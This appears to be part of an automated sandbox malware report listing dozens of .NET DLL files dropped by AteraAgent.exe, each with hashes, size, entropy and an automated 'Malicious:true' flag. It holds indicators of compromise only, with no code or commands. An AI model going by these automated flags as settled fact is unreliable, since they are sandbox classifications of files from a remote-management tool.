                                                                                                                                                                                                                                                                                                                                  SHA1:4E2EF2BB3086EF6DAABC06C4F9A1A225E31A468A
                                                                                                                                                                                                                                                                                                                                  SHA-256:4DEBFA817B9250DC70BFF9C59E875E87FB01C9634A89EAB00277807DB2F22A8A
                                                                                                                                                                                                                                                                                                                                  SHA-512:8BB87EEFF323D18425936E9D8EA0AF1491D5E2096152313EDD02E380BF9DC809FC1B49E0CDD906ECF6174FF4D6B4882C8BF3F43FDBB73DA094CF01314B5D6750
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.865758362646305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zUcX6W9aWTmNyb8E9VF6IYijSJIVx7y57f:zUchXuEpYi60c
                                                                                                                                                                                                                                                                                                                                  MD5:5B1256F37C5C54779867277088479340
                                                                                                                                                                                                                                                                                                                                  SHA1:D284C41E991C2B20A23943161E4ECA25D2FFEA2A
                                                                                                                                                                                                                                                                                                                                  SHA-256:6A7CA29868434B70F1441A21FF77AA9C1948291EE9EE4CFBF78C41B18962B137
                                                                                                                                                                                                                                                                                                                                  SHA-512:8F4DA4632250B95C7B1F10DCC2214B203BC54D0F3833DA669B71F496F956A8D060C9A40BEBF367774003AD66507509BE8A358E110CCD0BA8015CED3705FC22A7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.950664026032762
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:koBj7kS+8mjvHTeaWKs0Sd4eeUAEpYi60x:zPmb9WKs0PeeUJ764
                                                                                                                                                                                                                                                                                                                                  MD5:C5746582261786391320712E78B370B1
                                                                                                                                                                                                                                                                                                                                  SHA1:EFAA2CFF8D95E7C1BA47F93A10373BBE07406323
                                                                                                                                                                                                                                                                                                                                  SHA-256:27CA1FAF9CD6A1307B271256FF77F8504D5CEAFFC53559DE918D8D1E570ADC5E
                                                                                                                                                                                                                                                                                                                                  SHA-512:64CA47E2EFB9F2D00925D410BD8F5A5E29485203432875333BE871B7A27FD87D7D2943977F2004E988E383DD62D6476BF35B5BC560F7799600428CA910682010
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.893301124202397
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KTI2pWPzWmWeNyb8E9VF6IYijSJIVxWxypSK:KE3bnEpYi60ppl
                                                                                                                                                                                                                                                                                                                                  MD5:A614DB2C8BF5555E786DBF7B0A38CF0F
                                                                                                                                                                                                                                                                                                                                  SHA1:5F335B455E558154CAF074CF4AD9702EC9C45562
                                                                                                                                                                                                                                                                                                                                  SHA-256:84E9EE9B96C5D02BD179D849C00BC1B39F3F4D92CA2F8935802E14D7A8E6B895
                                                                                                                                                                                                                                                                                                                                  SHA-512:773EAE05C9257A4EDC172D175DA6CB3F84598FD75B61EF1D16BFAD97365A68E6A0A442BA544C13521E3CE08ACB812ABFEF0B65E8FEFD35651A4B2437FFA293AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9112351802090055
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zcezoy4W04WGINyb8E9VF6IYijSJIVxmMd:zBzoy+kgEpYi60r
                                                                                                                                                                                                                                                                                                                                  MD5:2166A9DA060E87521796C7F2F72D13C7
                                                                                                                                                                                                                                                                                                                                  SHA1:BC9D4036440763B3A4194181B1B7D486270A8E7D
                                                                                                                                                                                                                                                                                                                                  SHA-256:528960357AADA1464CDD32F77B074FBA71461E557A657B1C7775B107023E2ED4
                                                                                                                                                                                                                                                                                                                                  SHA-512:664D6CE3407023495E3B17FC96206D98D168BB5D55D7FD92A13ED2A57AFCDFA27EE3A2D7B2BB1318AD00D74D1013F9743ED0BD2986139D052FD95C9B8B36A50E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796205980673916
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:czgHWexY+WKpW5FPYNyby2sE9jBF6IYiYF85S35IVnxGUHFjekhT0p:NH/JWKpWDQNyb8E9VF6IYijSJIVxXno
                                                                                                                                                                                                                                                                                                                                  MD5:9CF5E4927F9CCE043EE8605B943DF4A4
                                                                                                                                                                                                                                                                                                                                  SHA1:056398411D7FFC7D475178F0CB4FD816BEF9F059
                                                                                                                                                                                                                                                                                                                                  SHA-256:79F274739C20A80E9BD3DB2879E460F4AF336A3AB578D0E21B10E59F422FDD83
                                                                                                                                                                                                                                                                                                                                  SHA-512:0F24DA69BE27AE6F5A94B8069D329439EF454E830822F2DBBE9540587F456D4381852E503E39D1CDEC11634A0C3CEC65D17E9F865AD1B917F945A710562BD8A6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.742652095009807
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:kTjbocNsWMhWqiNyb8E9VF6IYijSJIVxtLKy:IboYyFiEpYi60tB
                                                                                                                                                                                                                                                                                                                                  MD5:B1913ABA7CB4B8177597A01306077449
                                                                                                                                                                                                                                                                                                                                  SHA1:F8B5FBF3AE8BCD323E261708F8666D52E1967D26
                                                                                                                                                                                                                                                                                                                                  SHA-256:C652AE3A63C7361D9A66065BC5AF1486B5F4F9D49DDE88BD4D710064B596A668
                                                                                                                                                                                                                                                                                                                                  SHA-512:6D167B9CCE49EFCD6795085EF574505E663600ACDB5AA1E2A3EF2C42839140F5FB1A27CA5F22F0C9998A0FC51C70B52B4B84F2C9EEE06F6FD8F9AF98A889837B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.84199531949985
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:dSKiWIhWG3Nyb8E9VF6IYijSJIVxLp8Q+:dSK8l7EpYi609U
                                                                                                                                                                                                                                                                                                                                  MD5:BAF5AD32D34B62A97C8CBDEBC9C3F494
                                                                                                                                                                                                                                                                                                                                  SHA1:A9612646D46FBC9C7781A1276547789C1B93E914
                                                                                                                                                                                                                                                                                                                                  SHA-256:821CE0881EC98787B2D4EB96C6AEDE6F97A78D77317A6FE06D83116334C7C8C5
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C27EA3AB317358ABD0C74661470EE805477A39EB7804505DD2BFC6419E50171CD51948701E5DC313A5A276278BD33582365B7F26DDC815A4E32302A8020543C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.783015033813948
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:c0KbZWApWmWTpWSDNyb8E9VF6IYijSJIVxkp8Io8:zKRyhfEpYi603R8
                                                                                                                                                                                                                                                                                                                                  MD5:C37E91CF110F5CFE918FBE30CE619A7B
                                                                                                                                                                                                                                                                                                                                  SHA1:232428CC17FA86709D337CC9016EFD0FA2C3C0F8
                                                                                                                                                                                                                                                                                                                                  SHA-256:5CC275F2008667B255B88C9E521419E3F6B18FE05A08DE3FAF61BA645C99F064
                                                                                                                                                                                                                                                                                                                                  SHA-512:F3893766BB546DE7312A16B449904150076068F96D6230C5042337559FC29173B5B49A98ECC2C973C3829C6A3ADFB5DC7D9B0B20B2444ABB2AFADFA7F5C79E68
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.873669060159367
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:4b1nWCXWr7Nyb8E9VF6IYijSJIVxnY3xzgAD:C7yXEpYi601AD
                                                                                                                                                                                                                                                                                                                                  MD5:0648BAB981B4F9076A22C327D13CD08A
                                                                                                                                                                                                                                                                                                                                  SHA1:70410CF50049EFB72F2638598173562DEBB72D86
                                                                                                                                                                                                                                                                                                                                  SHA-256:AEC930AD98614C414198235DEB05594E4A2119AE6576805D4DFA1B35C641BD21
                                                                                                                                                                                                                                                                                                                                  SHA-512:574D68ED279EDAAD8ED49463BC598D0AB38033AE5F83E46F2BBBAFD3758B800599DB28A537E633B37407BE5A90AFC6416354A4AEB592DD2916B65EF502025261
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.777459680511861
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:PLyW7TWyDNyb8E9VF6IYijSJIVxRr9hq5T:zfPfEpYi6049
                                                                                                                                                                                                                                                                                                                                  MD5:8BAAAFB084DA2C7DFE21AA0979A93722
                                                                                                                                                                                                                                                                                                                                  SHA1:690D59B3A630B4BF7950B5F10EBBFEDAB2628C94
                                                                                                                                                                                                                                                                                                                                  SHA-256:3CFDF251C5251E44B2E920BD7BE396A459B0368FA24E9DEA704A0C095DFFA87E
                                                                                                                                                                                                                                                                                                                                  SHA-512:5C4E497EB2CF957E378ADEB12C4091FEF50518305302D110007615C3F32C8524FFE9FC041D639F517C550AB651970472AE7E36E54FA3317F611FB05EDFF8508C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.907203433654942
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:46Rb32WVzWwtNyb8E9VF6IYijSJIVx0Edn:3Rb3dtJEpYi60tn
                                                                                                                                                                                                                                                                                                                                  MD5:8BD46AFC5FFAA5AC0912DC27ED8225E6
                                                                                                                                                                                                                                                                                                                                  SHA1:A4EA5C760639D531B3B003A49350EA1A991009C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:30093DB698D34D8B943CAF84B1A92C879D9C9A69E535E659FCC6CFB55BC4CA83
                                                                                                                                                                                                                                                                                                                                  SHA-512:82B4407D2AE249561C15B94939380587540C6E16C565301C95698736763EE0E0392D7A04D3D4E60CE124965CCE1169AC566DE4E287FB71BA53FBF3BCE2D84D77
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):31784
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.53558632581047
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:au5I+sqOylryry8qqIfUc7a5eMEpYi60L1:aYIVBpry8qqIfUcm5eF76c1
                                                                                                                                                                                                                                                                                                                                  MD5:90A21B291D110909D1314FCF0FC72BB1
                                                                                                                                                                                                                                                                                                                                  SHA1:6DD7ADBEEE485479408860200DC5F49F115B80CA
                                                                                                                                                                                                                                                                                                                                  SHA-256:8F9872B47A03F49038AEF2E2A4F436C95C98E03454FB8FD4165BE30DD8568A5F
                                                                                                                                                                                                                                                                                                                                  SHA-512:242B8EF499FDC57F84C28AB05CED704522427A4564C8A09B1FAF3BDC1CD31BB81DA9976ECE434DF255B5DF6B242B7ED7119274D075BD4E016F90D3926E90C221
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.875436232333863
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.772316361734143
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.854792511202869
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.861033315380582
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.825651034994255
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16424
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.723492128711594
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:n6xWA3W4aW/NWQvNyb8E9VF6IYijSJIVxIJJpq:naB/TEpYi60N
                                                                                                                                                                                                                                                                                                                                  MD5:C64D37594DC6186E554E9BD43B596D83
                                                                                                                                                                                                                                                                                                                                  SHA1:CA7E94206F0817FFC4CBBD46858F5523C06A1981
                                                                                                                                                                                                                                                                                                                                  SHA-256:D52DED473FE832DCDCD12C2FCDB602F5DE12255E6D649CE72093065E02905BEA
                                                                                                                                                                                                                                                                                                                                  SHA-512:6712493B2C5179E14186718F87B963A2299CEA501D5B9AA47331A82E54A961727CEABEFFF00B3A5C7BC97A81F8DC22773966460C35BFF324EA61DEDACEF24A15
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73256
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.953307803231714
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:y784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nf:y7N1r9KGI04CCAskwf
                                                                                                                                                                                                                                                                                                                                  MD5:9B233BD5FDD7AF8177F6F85224FF98CF
                                                                                                                                                                                                                                                                                                                                  SHA1:1A61D930F9EEF89A4561A880F7A5331C9A576365
                                                                                                                                                                                                                                                                                                                                  SHA-256:789BF4C5180E807102E33F75B843212E3C6D74ABE8F3FBA97ED3CD443D9AEFB3
                                                                                                                                                                                                                                                                                                                                  SHA-512:AF8AE3124F376072DD0D4733FB06C393BDF490BED6C11451DD2FC68436C442D94A60D129AC4A4414962B43AAB70CDFD512C06D93EB360B547E7AF241B1D6D349
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8518491573807845
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:0r97WquW6/Nyb8E9VF6IYijSJIVxkp9oK4f:0RJKDEpYi60eHK
                                                                                                                                                                                                                                                                                                                                  MD5:F93FE4F480FFDAD9309F49DD63BDA546
                                                                                                                                                                                                                                                                                                                                  SHA1:AD829C8754D369FA59B29335522BAB4B0E7FCD71
                                                                                                                                                                                                                                                                                                                                  SHA-256:EA5C5FB61F0F7B574C287032819F2D2AA482AE7963A18890FBDA182F3A227869
                                                                                                                                                                                                                                                                                                                                  SHA-512:BE0046D693F2CAFAA2000C9C43D3A3F51EFB21855D65D96C0E9EC81F5A9B78FD26510D2C788E9DE85BCC98A44FC106C804EC04E4C44FCFF9A483F7ECA216097F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.791670945936359
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:S16eWLDWGoNyb8E9VF6IYijSJIVx4Ic75l:O6LbAEpYi60w77
                                                                                                                                                                                                                                                                                                                                  MD5:74BAD85D3EE48A89E4F03DEC58FDF5ED
                                                                                                                                                                                                                                                                                                                                  SHA1:8B62ED30762A5B8B3D4CEBF394014A0A929125F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8D060E43D4F7893D8EF0ED05362A1030E097036895A637813C768D02A7DB83AD
                                                                                                                                                                                                                                                                                                                                  SHA-512:83291CB73FDE4B0626A358C5B562C9FEF5DE8E9AC302358B12B86132CA39EDE003BE8C5C56572B8B69B1F51C0C7E0E238D5A2B9E6DF2DDF06123525C2D0AC9C5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.786405492808321
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:O8G4YC2W+wW8WpwWU4Nyb8E9VF6IYijSJIVxPvvqE:BGZ5OwEpYi60v7
                                                                                                                                                                                                                                                                                                                                  MD5:3CBAA09A878FBE1B21F5C7B71C113EC1
                                                                                                                                                                                                                                                                                                                                  SHA1:A055C5111EB6DD0F1464E74B4B28DD0B8FE1DEE0
                                                                                                                                                                                                                                                                                                                                  SHA-256:BBD10B84456363D69CFE6993A06DF3A7B23025D28710596D18247D8F43DC8045
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4DDF058595B0BA1ABB9831043A597A832347A6A9344FBD24C855908626AC1C10062C09A7DEE1029904C04778DB94D8346E5B59C266DCB47A7D6D95C19D57CD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.896898413791011
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:j6ziqTEkGWvRWH1Nyb8E9VF6IYijSJIVxKPtVUa:jYT1cREpYi600N
                                                                                                                                                                                                                                                                                                                                  MD5:73A5C82562EF738015E52E94E69805D4
                                                                                                                                                                                                                                                                                                                                  SHA1:699B25ADB46FC14215321E83659512CCB557DB8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:08362C176C9A6233ED2DFC393A984C653FCDA4FB891B706381D613C763105B71
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6B28B3CE76D65420DC96171DFEC5F6E292ED20D46FBB7B48D4DFA961B88CA053D3F8F91D11E4398BA6A6485610670ACA769B93B1F6F30A1BCA653EE235D986C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.80616619726168
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:JUv7c7iWNCWq0Nyb8E9VF6IYijSJIVxILsyW:JM7c1m0EpYi600/W
                                                                                                                                                                                                                                                                                                                                  MD5:14ACFB91C522AABD4998A62FD09B8D1B
                                                                                                                                                                                                                                                                                                                                  SHA1:5568AC17F8A243FA6F4E5F84D7204963A755C2AA
                                                                                                                                                                                                                                                                                                                                  SHA-256:F9C8464E864561E09F6DB8B99F67B277325F2B2B17D338C60B99C6698C467FA2
                                                                                                                                                                                                                                                                                                                                  SHA-512:CE45D85CB2EC928865FC35BB307E15F5FF3742B8634B61AD043E1FB4F92C414E8F2CEA26FB1838F91626BB8E9E9E7EE72B6AA3F162C459E0C4A1F40C176E66C6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.850300875865294
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
